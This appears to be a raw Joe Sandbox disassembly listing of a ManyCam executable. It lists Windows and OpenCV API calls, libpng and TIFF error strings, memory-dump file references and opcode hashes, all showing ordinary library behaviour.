                                                                                                                                            • IsWindow.USER32(?), ref: 00B916B1
                                                                                                                                            • SendMessageA.USER32(?,0000040B,00000000,00000000), ref: 00B916C2
                                                                                                                                            • DestroyWindow.USER32(?), ref: 00B916C8
                                                                                                                                            • cvReleaseImage.CXCORE099(?), ref: 00B916D2
                                                                                                                                            • ICSendMessage.MSVFW32(?,0000400E,00000000,00000000), ref: 00B916E9
                                                                                                                                            • ICClose.MSVFW32(?,?,0000400E,00000000,00000000), ref: 00B916F2
                                                                                                                                            • memset.MSVCR80 ref: 00B9170C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSendWindow$CloseDestroyImageReleasememset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1564840505-0
                                                                                                                                            • Opcode ID: 2a5ef0d4c19fa3de5306b8dbbf3865baaf24de368cd65d88d14ca28acda11bac
                                                                                                                                            • Instruction ID: 1909fc058303757930d00f4c8e5f4a0d9d7ff2b49f8fbd10a706caf1849c0ebd
                                                                                                                                            • Opcode Fuzzy Hash: 2a5ef0d4c19fa3de5306b8dbbf3865baaf24de368cd65d88d14ca28acda11bac
                                                                                                                                            • Instruction Fuzzy Hash: 3E11A7B2510709ABC660AFAADE80D27F7ECFF453447865C5DF28697A40D775F8008B64
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00BCC870: GlobalAlloc.KERNEL32(00000000,00000000,00BCFB2A,00BD084E,?,?,?,00BD084E,?,?,00000000,?), ref: 00BCC877
                                                                                                                                            • _ftol.MSVCR80 ref: 00BD3F28
                                                                                                                                            Strings
                                                                                                                                            • No space to write array, xrefs: 00BD3EDA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocGlobal_ftol
                                                                                                                                            • String ID: No space to write array
                                                                                                                                            • API String ID: 2648542381-3993372183
                                                                                                                                            • Opcode ID: 02e20b7db01dde699250921756fb672ec61aee7716ee1c8a6df549f7c031d632
                                                                                                                                            • Instruction ID: 1adef382cae1a469826a7e186b702409b0c54b09c59a922bd615c14c886bfeb2
                                                                                                                                            • Opcode Fuzzy Hash: 02e20b7db01dde699250921756fb672ec61aee7716ee1c8a6df549f7c031d632
                                                                                                                                            • Instruction Fuzzy Hash: D56188B690420A9BC710DF14D8819ABFBE8EF84744B1049AAF9558B302E731DE19C7A2
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • Invalid fixed cHRM green point specified, xrefs: 00BC05BD
                                                                                                                                            • Invalid cHRM fixed red point specified, xrefs: 00BC05D5
                                                                                                                                            • Invalid fixed cHRM white point specified, xrefs: 00BC05ED
                                                                                                                                            • Invalid fixed cHRM blue point specified, xrefs: 00BC05A5
                                                                                                                                            • cHRM, xrefs: 00BC058D
                                                                                                                                            • white_x=%ld, white_y=%ld, xrefs: 00BC0603
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: fprintf
                                                                                                                                            • String ID: Invalid cHRM fixed red point specified$Invalid fixed cHRM blue point specified$Invalid fixed cHRM green point specified$Invalid fixed cHRM white point specified$cHRM$white_x=%ld, white_y=%ld
                                                                                                                                            • API String ID: 383729395-227365660
                                                                                                                                            • Opcode ID: 0ed41b6e6431507a4e27ebf79107804d8d955561da7f346b226353e069c8ea1c
                                                                                                                                            • Instruction ID: 0045818ceeb1c00dd3489e2e4fd9636036bb792fc20d7f29a7ae39a9a6eff320
                                                                                                                                            • Opcode Fuzzy Hash: 0ed41b6e6431507a4e27ebf79107804d8d955561da7f346b226353e069c8ea1c
                                                                                                                                            • Instruction Fuzzy Hash: F3419276500311AFD218E769CCC5CFF73E8EFD4714B84489DF55853211E7A4EA8987A2
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(?,-80000000,00000001,00000000,00000002,00000001,00000000), ref: 00BCC7C9
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BCC803
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BCC840
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$CreateFile
                                                                                                                                            • String ID: %S: Cannot open$<unknown>$Can't allocate space for filename conversion buffer$TIFFOpenW
                                                                                                                                            • API String ID: 472006099-3993974821
                                                                                                                                            • Opcode ID: edfb1f277d3a7e2284762f9eba41738ded2b3f5bdeefa6f4d7b022d2d59ae099
                                                                                                                                            • Instruction ID: 3b782a46e4114c68608e409f8db6736e556ddd3a9120892072b17bd7a2eee8cb
                                                                                                                                            • Opcode Fuzzy Hash: edfb1f277d3a7e2284762f9eba41738ded2b3f5bdeefa6f4d7b022d2d59ae099
                                                                                                                                            • Instruction Fuzzy Hash: 9D3127B674121127E6205579AC8AF7B6ECDCBE1771F2406BAF219E62C1EA558C0142B2
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeapmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 622753528-0
                                                                                                                                            • Opcode ID: 2c09cb3bd4d98cd5ac2316cddb9aa19e67c7f66a0578b6bf1a6e020fd8d26f0b
                                                                                                                                            • Instruction ID: 15c03739bf2cff661cf5d104c6130bcee5a7d3e6e4c58e74d1621743953f5b5e
                                                                                                                                            • Opcode Fuzzy Hash: 2c09cb3bd4d98cd5ac2316cddb9aa19e67c7f66a0578b6bf1a6e020fd8d26f0b
                                                                                                                                            • Instruction Fuzzy Hash: 81F17A719022199BDB28EB10CD9ABEEBBB4BF54304F1085E9E40A671D1DB745F88CF91
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@$_setjmp3
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4193736177-0
                                                                                                                                            • Opcode ID: 662877c835ea13579dd87d4aa4e53fef54bb3453f1de8e9738431b40fb1c83e2
                                                                                                                                            • Instruction ID: ec14f28ca0e53537a96649e5057697d7110628552f5b4c70965d252dbe46c01f
                                                                                                                                            • Opcode Fuzzy Hash: 662877c835ea13579dd87d4aa4e53fef54bb3453f1de8e9738431b40fb1c83e2
                                                                                                                                            • Instruction Fuzzy Hash: 98D16CB19006489FDF34DF24CC95BEA77E9EB44304F2485A9F86AC7252E731E944CB92
                                                                                                                                            APIs
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00482602
                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(00000000,00000104,00000104,?,0049A100,7EC02BB4,?), ref: 00482644
                                                                                                                                            • LoadLibraryW.KERNEL32(00000000,\winhlp32.exe,000000FF,?,0049A100,7EC02BB4,?), ref: 0048266A
                                                                                                                                            • LoadCursorW.USER32(00000000,0000006A), ref: 0048267F
                                                                                                                                            • CopyIcon.USER32(?), ref: 00482692
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004826A5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load$CursorLibrary$CopyDirectoryFreeIconWindows
                                                                                                                                            • String ID: \winhlp32.exe
                                                                                                                                            • API String ID: 501009500-695620452
                                                                                                                                            • Opcode ID: 72d25b9e93f0e45ffb332d077584a673b3d5e48780a8d95c32651a89c6593934
                                                                                                                                            • Instruction ID: ec6d5bdbcb5f979a409084d156352cb5eef125df936233655878cf5ad0338882
                                                                                                                                            • Opcode Fuzzy Hash: 72d25b9e93f0e45ffb332d077584a673b3d5e48780a8d95c32651a89c6593934
                                                                                                                                            • Instruction Fuzzy Hash: 0D313A71D00208AFDB04EFA4E959BEDBBB5FB18314F50462AF916A72D0DB786948CB14
                                                                                                                                            APIs
                                                                                                                                            • fprintf.MSVCR80 ref: 00BBB663
                                                                                                                                            • fprintf.MSVCR80 ref: 00BBB67F
                                                                                                                                            • fprintf.MSVCR80 ref: 00BBB699
                                                                                                                                            • longjmp.MSVCR80(?,00000001,?,?,?,?,?,?,?,?,?,?,Out of Memory!,?), ref: 00BBB6A9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: fprintf$longjmp
                                                                                                                                            • String ID: libpng error no. %s: %s$libpng error: %s$libpng error: %s, offset=%d
                                                                                                                                            • API String ID: 1832846611-3377054135
                                                                                                                                            • Opcode ID: 2ae5dd0ecbcd9f625efd407bae6acdcb4fb456af72f1dfed077c9679a44e4f43
                                                                                                                                            • Instruction ID: 3ceed0b60085dbd90365fa9dd589c8feee5bbf97364b525c6c46c34fcefa1faf
                                                                                                                                            • Opcode Fuzzy Hash: 2ae5dd0ecbcd9f625efd407bae6acdcb4fb456af72f1dfed077c9679a44e4f43
                                                                                                                                            • Instruction Fuzzy Hash: AA11E9715042416BD3105B28DC69EFAFFE9DB82304F14458AF4C7E72A2EBA5DC45C751
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _ftol
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2545261903-0
                                                                                                                                            • Opcode ID: afb9fd2aacef2182512d4a46a1022e743f076861730f62f5dcfdfff6946049f5
                                                                                                                                            • Instruction ID: 45835c6ee1bf213e8ac0e5e0b579ca5887898eda4bbb95f4fa53e1b71c89dd4c
                                                                                                                                            • Opcode Fuzzy Hash: afb9fd2aacef2182512d4a46a1022e743f076861730f62f5dcfdfff6946049f5
                                                                                                                                            • Instruction Fuzzy Hash: F3D13872909342DFD3029F21D48925ABFB0FFD5344FA64A99E0D56626AE330C578CF86
                                                                                                                                            APIs
                                                                                                                                            • cvCopy.CXCORE099(?,?,00000000,?,?,?,FFFFFFFE,?,?,?,?,00401620), ref: 00404309
                                                                                                                                            • cvInvert.CXCORE099(?,?,00000000,?,?,FFFFFFFE,?,?,?,?,00401620), ref: 00404321
                                                                                                                                            • cvGEMM.CXCORE099(?,?,?,?,?,00000000,?,?,?,?,?,FFFFFFFE), ref: 0040436B
                                                                                                                                              • Part of subcall function 00403550: cvResetImageROI.CXCORE099(?,?,FFFFFFFE), ref: 004035F7
                                                                                                                                              • Part of subcall function 00403550: cvResetImageROI.CXCORE099(?,FFFFFFFE), ref: 00403603
                                                                                                                                              • Part of subcall function 00403550: cvResetImageROI.CXCORE099(?,?,FFFFFFFE), ref: 0040360F
                                                                                                                                              • Part of subcall function 00403550: cvSet.CXCORE099(?), ref: 00403636
                                                                                                                                              • Part of subcall function 00403550: cvSet.CXCORE099(?), ref: 0040365D
                                                                                                                                            • cvSetImageROI.CXCORE099(?), ref: 004043B7
                                                                                                                                            • cvSetImageROI.CXCORE099(?), ref: 004043D9
                                                                                                                                            • cvCopy.CXCORE099(?,?,00000000), ref: 004043E5
                                                                                                                                            • cvResetImageROI.CXCORE099(?), ref: 004043EE
                                                                                                                                            • cvResetImageROI.CXCORE099(?), ref: 004043F7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Image$Reset$Copy$Invert
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2642547888-0
                                                                                                                                            • Opcode ID: e93eb0512fcc8a041c5aa665e6f27bd66d5727e802e950380074bd07c4e28349
                                                                                                                                            • Instruction ID: 4832167a604e7eee410914a1b349f3b52c2c1ab0660e6587da0ebae9eec7833f
                                                                                                                                            • Opcode Fuzzy Hash: e93eb0512fcc8a041c5aa665e6f27bd66d5727e802e950380074bd07c4e28349
                                                                                                                                            • Instruction Fuzzy Hash: 5B3153F4A007009FC314EF14D886F57BBE4AF89710F04896DE98A57381D635E9158BA6
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,00000000,00534159,000000FF,?,004C2664,?,00000001,00000000,004BCB55,00000001,00000000,00000000), ref: 004C2804
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 004C2818
                                                                                                                                            • _CxxThrowException.MSVCR80(d&L,0057CBF8), ref: 004C2826
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(d&L,0057CBF8,?,?,?,00000000,00534159,000000FF,?,004C2664,?,00000001,00000000,004BCB55,00000001,00000000), ref: 004C2835
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: d&L$map/set<T> too long
                                                                                                                                            • API String ID: 3248949544-2396053701
                                                                                                                                            • Opcode ID: 9e2109b489b36a333a9366bcbadb2707d019cd34c0dca1b399f2e05f1bc863c7
                                                                                                                                            • Instruction ID: 0421590c6fc88a653ea049570befb3043dc480636a3316981a528d684021d55e
                                                                                                                                            • Opcode Fuzzy Hash: 9e2109b489b36a333a9366bcbadb2707d019cd34c0dca1b399f2e05f1bc863c7
                                                                                                                                            • Instruction Fuzzy Hash: 8DD11B74A002459FCB04FFA9C991EAF7776AF89304B20456EF4159B356CB78AC05CBB8
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,00000000,00535759,000000FF,?,004D4C24,?,00000001,00000000,?,00000001,00000000,00000000), ref: 004D4DC4
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 004D4DD8
                                                                                                                                            • _CxxThrowException.MSVCR80($LM,0057CBF8), ref: 004D4DE6
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80($LM,0057CBF8,?,?,?,00000000,00535759,000000FF,?,004D4C24,?,00000001,00000000,?,00000001,00000000), ref: 004D4DF5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: $LM$map/set<T> too long
                                                                                                                                            • API String ID: 3248949544-3238143215
                                                                                                                                            • Opcode ID: b3a5ef0cd3d0604de93e7cfc4f998ecbca4839092f53841d330d18dc272e40e7
                                                                                                                                            • Instruction ID: a07927191520cae1e6be455f76438f534ad6819f987c116f95f500b89d554bea
                                                                                                                                            • Opcode Fuzzy Hash: b3a5ef0cd3d0604de93e7cfc4f998ecbca4839092f53841d330d18dc272e40e7
                                                                                                                                            • Instruction Fuzzy Hash: A9D10B71A142159FCB04EFE5E8A1E6F7776AFC9304B50455FF0129B359DA38AC02CBA8
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
                                                                                                                                              • Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5
                                                                                                                                            • Concurrency::task_options::get_scheduler.LIBCPMTD ref: 004AAC1D
                                                                                                                                            • Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 004AAC4F
                                                                                                                                              • Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F
                                                                                                                                            Strings
                                                                                                                                            • Inserting effect %s to stack at position %d., xrefs: 004AACE1
                                                                                                                                            • CVideoProcessor::InsertEffectToStack, xrefs: 004AAB4B
                                                                                                                                            • Inserting effect %s\%s\%s to stack at position %d., xrefs: 004AAC73
                                                                                                                                            Memory Dump Source
